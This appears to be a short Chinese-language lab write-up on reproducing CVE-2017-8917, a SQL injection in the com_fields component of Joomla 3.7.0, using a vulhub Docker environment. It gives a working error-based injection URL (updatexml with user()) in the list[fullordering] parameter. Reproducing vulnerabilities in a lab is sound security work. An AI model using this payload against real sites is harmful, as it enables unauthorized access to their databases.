# Joomla 3.7.0 SQL注入漏洞CVE-2017-8917
#### 简介
漏洞是由此Joomla 3.7.0 版本中引入的新组件(com\_fields)带来的
#### 环境搭建
cd /root/vulhub/joomla/CVE-2017-8917 docker-compose up -d 
启动后访问http://your-ip:8080即可看到Joomla的安装界面 按照顺序安装即可 安装完成后,访问http://your-ip:8080/index.php?option=com\_fields&view=fields&layout=modal&list\[fullordering\]=updatexml(0x23,concat(1,user()),1),即可看到报错信息: 
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容